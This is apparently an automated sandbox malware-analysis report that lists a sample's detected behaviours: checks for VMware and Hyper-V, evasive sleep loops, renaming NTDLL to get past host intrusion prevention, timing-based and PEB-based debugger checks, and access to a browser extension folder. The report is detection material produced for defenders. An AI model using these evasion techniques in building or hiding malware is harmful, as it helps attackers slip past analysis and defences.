Source: C:\Users\user\AppData\Local\Temp\46D6.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\iwbavbe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Renames NTDLL to bypass HIPS
Source: C:\Users\user\AppData\Local\Temp\20BD.exe File opened: C:\Windows\SysWOW64\ntdll.dll
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\31F4.exe TID: 2900 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\5483.exe TID: 3684 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 492 Thread sleep time: -2767011611056431s >= -30000s
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 603
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 363
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4777
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3766
Found dropped PE file which has not been started or loaded
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3D90.exe
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\39A7.exe
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2CF4.exe
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB96B90 rdtsc 20_2_6AB96B90
Source: C:\Users\user\AppData\Local\Temp\5483.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\Temp\5483.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\5483.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\Temp\5483.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\AppData\Local\Temp\5483.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\5483.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: explorer.exe, 00000006.00000000.721694539.000000000FDAA000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.707083087.000000000A897000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.732920845.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.707083087.000000000A897000.00000004.00000001.sdmp Binary or memory string: 000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&d
Source: explorer.exe, 00000006.00000000.733043896.000000000A716000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_SATAY
Source: explorer.exe, 00000006.00000000.716770307.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.714052805.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000006.00000000.733043896.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000006.00000000.733043896.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: 3C84.exe, 00000017.00000002.1072882664.000000000118D000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe System information queried: ModuleInformation

Anti Debugging:

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\20BD.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\iwbavbe System information queried: CodeIntegrityInformation
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 0_2_00426900 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00426900
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB912BD mov esi, dword ptr fs:[00000030h] 20_2_6AB912BD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB912BD mov eax, dword ptr fs:[00000030h] 20_2_6AB912BD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB652A5 mov eax, dword ptr fs:[00000030h] 20_2_6AB652A5
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB61AA0 mov eax, dword ptr fs:[00000030h] 20_2_6AB61AA0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB95AA0 mov eax, dword ptr fs:[00000030h] 20_2_6AB95AA0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38ADD mov eax, dword ptr fs:[00000030h] 20_2_6AC38ADD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24AEF mov eax, dword ptr fs:[00000030h] 20_2_6AC24AEF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9D294 mov eax, dword ptr fs:[00000030h] 20_2_6AB9D294
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB65AC0 mov eax, dword ptr fs:[00000030h] 20_2_6AB65AC0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB63ACA mov eax, dword ptr fs:[00000030h] 20_2_6AB63ACA
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB68239 mov eax, dword ptr fs:[00000030h] 20_2_6AB68239
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A229 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A229
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB64A20 mov eax, dword ptr fs:[00000030h] 20_2_6AB64A20
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABEEA20 mov eax, dword ptr fs:[00000030h] 20_2_6ABEEA20
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC1B260 mov eax, dword ptr fs:[00000030h] 20_2_6AC1B260
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38A62 mov eax, dword ptr fs:[00000030h] 20_2_6AC38A62
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB83A1C mov eax, dword ptr fs:[00000030h] 20_2_6AB83A1C
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB65210 mov eax, dword ptr fs:[00000030h] 20_2_6AB65210
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB65210 mov ecx, dword ptr fs:[00000030h] 20_2_6AB65210
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB78A0A mov eax, dword ptr fs:[00000030h] 20_2_6AB78A0A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA927A mov eax, dword ptr fs:[00000030h] 20_2_6ABA927A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF4257 mov eax, dword ptr fs:[00000030h] 20_2_6ABF4257
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB69240 mov eax, dword ptr fs:[00000030h] 20_2_6AB69240
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB62240 mov ecx, dword ptr fs:[00000030h] 20_2_6AB62240
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB62240 mov eax, dword ptr fs:[00000030h] 20_2_6AB62240
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF4248 mov eax, dword ptr fs:[00000030h] 20_2_6ABF4248
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB94BAD mov eax, dword ptr fs:[00000030h] 20_2_6AB94BAD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC123E3 mov ecx, dword ptr fs:[00000030h] 20_2_6AC123E3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC123E3 mov eax, dword ptr fs:[00000030h] 20_2_6AC123E3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB64B94 mov edi, dword ptr fs:[00000030h] 20_2_6AB64B94
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB623F6 mov eax, dword ptr fs:[00000030h] 20_2_6AB623F6
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC2138A mov eax, dword ptr fs:[00000030h] 20_2_6AC2138A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC0EB8A mov ecx, dword ptr fs:[00000030h] 20_2_6AC0EB8A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC0EB8A mov eax, dword ptr fs:[00000030h] 20_2_6AC0EB8A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB61BE9 mov eax, dword ptr fs:[00000030h] 20_2_6AB61BE9
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC21BA8 mov eax, dword ptr fs:[00000030h] 20_2_6AC21BA8
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38BB6 mov eax, dword ptr fs:[00000030h] 20_2_6AC38BB6
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC39BBE mov eax, dword ptr fs:[00000030h] 20_2_6AC39BBE
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38B58 mov eax, dword ptr fs:[00000030h] 20_2_6AC38B58
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF4320 mov eax, dword ptr fs:[00000030h] 20_2_6ABF4320
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB93B7A mov eax, dword ptr fs:[00000030h] 20_2_6AB93B7A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC2131B mov eax, dword ptr fs:[00000030h] 20_2_6AC2131B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB93B5A mov eax, dword ptr fs:[00000030h] 20_2_6AB93B5A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6F340 mov eax, dword ptr fs:[00000030h] 20_2_6AB6F340
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6DB40 mov eax, dword ptr fs:[00000030h] 20_2_6AB6DB40
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6E8B0 mov eax, dword ptr fs:[00000030h] 20_2_6AB6E8B0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9F0BF mov ecx, dword ptr fs:[00000030h] 20_2_6AB9F0BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9F0BF mov eax, dword ptr fs:[00000030h] 20_2_6AB9F0BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA90AF mov eax, dword ptr fs:[00000030h] 20_2_6ABA90AF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB728AE mov eax, dword ptr fs:[00000030h] 20_2_6AB728AE
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB728AE mov ecx, dword ptr fs:[00000030h] 20_2_6AB728AE
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB63880 mov eax, dword ptr fs:[00000030h] 20_2_6AB63880
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABE3884 mov eax, dword ptr fs:[00000030h] 20_2_6ABE3884
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB728FD mov eax, dword ptr fs:[00000030h] 20_2_6AB728FD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB640E1 mov eax, dword ptr fs:[00000030h] 20_2_6AB640E1
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB658EC mov eax, dword ptr fs:[00000030h] 20_2_6AB658EC
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8B8E4 mov eax, dword ptr fs:[00000030h] 20_2_6AB8B8E4
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABFB8D0 mov eax, dword ptr fs:[00000030h] 20_2_6ABFB8D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABFB8D0 mov ecx, dword ptr fs:[00000030h] 20_2_6ABFB8D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB670C0 mov eax, dword ptr fs:[00000030h] 20_2_6AB670C0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A830 mov eax, dword ptr fs:[00000030h] 20_2_6AB8A830
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB94020 mov edi, dword ptr fs:[00000030h] 20_2_6AB94020
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB7B02A mov eax, dword ptr fs:[00000030h] 20_2_6AB7B02A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6F018 mov eax, dword ptr fs:[00000030h] 20_2_6AB6F018
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6F018 mov eax, dword ptr fs:[00000030h] 20_2_6AB6F018
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC22073 mov eax, dword ptr fs:[00000030h] 20_2_6AC22073
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB66800 mov eax, dword ptr fs:[00000030h] 20_2_6AB66800
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB66800 mov eax, dword ptr fs:[00000030h] 20_2_6AB66800
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB66800 mov eax, dword ptr fs:[00000030h] 20_2_6AB66800
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB78800 mov eax, dword ptr fs:[00000030h] 20_2_6AB78800
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8F86D mov eax, dword ptr fs:[00000030h] 20_2_6AB8F86D
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC34015 mov eax, dword ptr fs:[00000030h] 20_2_6AC34015
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC34015 mov eax, dword ptr fs:[00000030h] 20_2_6AC34015
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC3F019 mov eax, dword ptr fs:[00000030h] 20_2_6AC3F019
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC3F019 mov eax, dword ptr fs:[00000030h] 20_2_6AC3F019
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB67055 mov eax, dword ptr fs:[00000030h] 20_2_6AB67055
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB65050 mov eax, dword ptr fs:[00000030h] 20_2_6AB65050
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB65050 mov eax, dword ptr fs:[00000030h] 20_2_6AB65050
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB65050 mov eax, dword ptr fs:[00000030h] 20_2_6AB65050
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB899BF mov ecx, dword ptr fs:[00000030h] 20_2_6AB899BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB899BF mov ecx, dword ptr fs:[00000030h] 20_2_6AB899BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB899BF mov eax, dword ptr fs:[00000030h] 20_2_6AB899BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB899BF mov ecx, dword ptr fs:[00000030h] 20_2_6AB899BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB899BF mov ecx, dword ptr fs:[00000030h] 20_2_6AB899BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB899BF mov eax, dword ptr fs:[00000030h] 20_2_6AB899BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB899BF mov ecx, dword ptr fs:[00000030h] 20_2_6AB899BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB899BF mov ecx, dword ptr fs:[00000030h] 20_2_6AB899BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB899BF mov eax, dword ptr fs:[00000030h] 20_2_6AB899BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB899BF mov ecx, dword ptr fs:[00000030h] 20_2_6AB899BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB899BF mov ecx, dword ptr fs:[00000030h] 20_2_6AB899BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB899BF mov eax, dword ptr fs:[00000030h] 20_2_6AB899BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB961A0 mov eax, dword ptr fs:[00000030h] 20_2_6AB961A0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB961A0 mov eax, dword ptr fs:[00000030h] 20_2_6AB961A0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC389E7 mov eax, dword ptr fs:[00000030h] 20_2_6AC389E7
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6519E mov eax, dword ptr fs:[00000030h] 20_2_6AB6519E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6519E mov ecx, dword ptr fs:[00000030h] 20_2_6AB6519E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB94190 mov eax, dword ptr fs:[00000030h] 20_2_6AB94190
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8C182 mov eax, dword ptr fs:[00000030h] 20_2_6AB8C182
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9A185 mov eax, dword ptr fs:[00000030h] 20_2_6AB9A185
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC2A189 mov eax, dword ptr fs:[00000030h] 20_2_6AC2A189
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC2A189 mov ecx, dword ptr fs:[00000030h] 20_2_6AC2A189
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB631E0 mov eax, dword ptr fs:[00000030h] 20_2_6AB631E0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF41E8 mov eax, dword ptr fs:[00000030h] 20_2_6ABF41E8
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6B1E1 mov eax, dword ptr fs:[00000030h] 20_2_6AB6B1E1
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6B1E1 mov eax, dword ptr fs:[00000030h] 20_2_6AB6B1E1
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6B1E1 mov eax, dword ptr fs:[00000030h] 20_2_6AB6B1E1
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC249A4 mov eax, dword ptr fs:[00000030h] 20_2_6AC249A4
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC249A4 mov eax, dword ptr fs:[00000030h] 20_2_6AC249A4
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC249A4 mov eax, dword ptr fs:[00000030h] 20_2_6AC249A4
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC249A4 mov eax, dword ptr fs:[00000030h] 20_2_6AC249A4
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9513A mov eax, dword ptr fs:[00000030h] 20_2_6AB9513A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9513A mov eax, dword ptr fs:[00000030h] 20_2_6AB9513A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB63138 mov ecx, dword ptr fs:[00000030h] 20_2_6AB63138
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB84120 mov eax, dword ptr fs:[00000030h] 20_2_6AB84120
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB84120 mov eax, dword ptr fs:[00000030h] 20_2_6AB84120
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB84120 mov eax, dword ptr fs:[00000030h] 20_2_6AB84120
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB84120 mov eax, dword ptr fs:[00000030h] 20_2_6AB84120
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB84120 mov ecx, dword ptr fs:[00000030h] 20_2_6AB84120
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38966 mov eax, dword ptr fs:[00000030h] 20_2_6AC38966
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB69100 mov eax, dword ptr fs:[00000030h] 20_2_6AB69100
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB69100 mov eax, dword ptr fs:[00000030h] 20_2_6AB69100
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB69100 mov eax, dword ptr fs:[00000030h] 20_2_6AB69100
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB70100 mov eax, dword ptr fs:[00000030h] 20_2_6AB70100
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB70100 mov eax, dword ptr fs:[00000030h] 20_2_6AB70100
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB70100 mov eax, dword ptr fs:[00000030h] 20_2_6AB70100
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6B171 mov eax, dword ptr fs:[00000030h] 20_2_6AB6B171
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6B171 mov eax, dword ptr fs:[00000030h] 20_2_6AB6B171
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6395E mov eax, dword ptr fs:[00000030h] 20_2_6AB6395E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6395E mov eax, dword ptr fs:[00000030h] 20_2_6AB6395E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8B944 mov eax, dword ptr fs:[00000030h] 20_2_6AB8B944
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8B944 mov eax, dword ptr fs:[00000030h] 20_2_6AB8B944
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38ED6 mov eax, dword ptr fs:[00000030h] 20_2_6AC38ED6
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABE46A7 mov eax, dword ptr fs:[00000030h] 20_2_6ABE46A7
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF2EA3 mov eax, dword ptr fs:[00000030h] 20_2_6ABF2EA3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9DE9E mov eax, dword ptr fs:[00000030h] 20_2_6AB9DE9E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9DE9E mov eax, dword ptr fs:[00000030h] 20_2_6AB9DE9E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9DE9E mov eax, dword ptr fs:[00000030h] 20_2_6AB9DE9E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB63E80 mov eax, dword ptr fs:[00000030h] 20_2_6AB63E80
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB63E80 mov eax, dword ptr fs:[00000030h] 20_2_6AB63E80
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB776E2 mov eax, dword ptr fs:[00000030h] 20_2_6AB776E2
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB916E0 mov ecx, dword ptr fs:[00000030h] 20_2_6AB916E0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA3EE4 mov eax, dword ptr fs:[00000030h] 20_2_6ABA3EE4
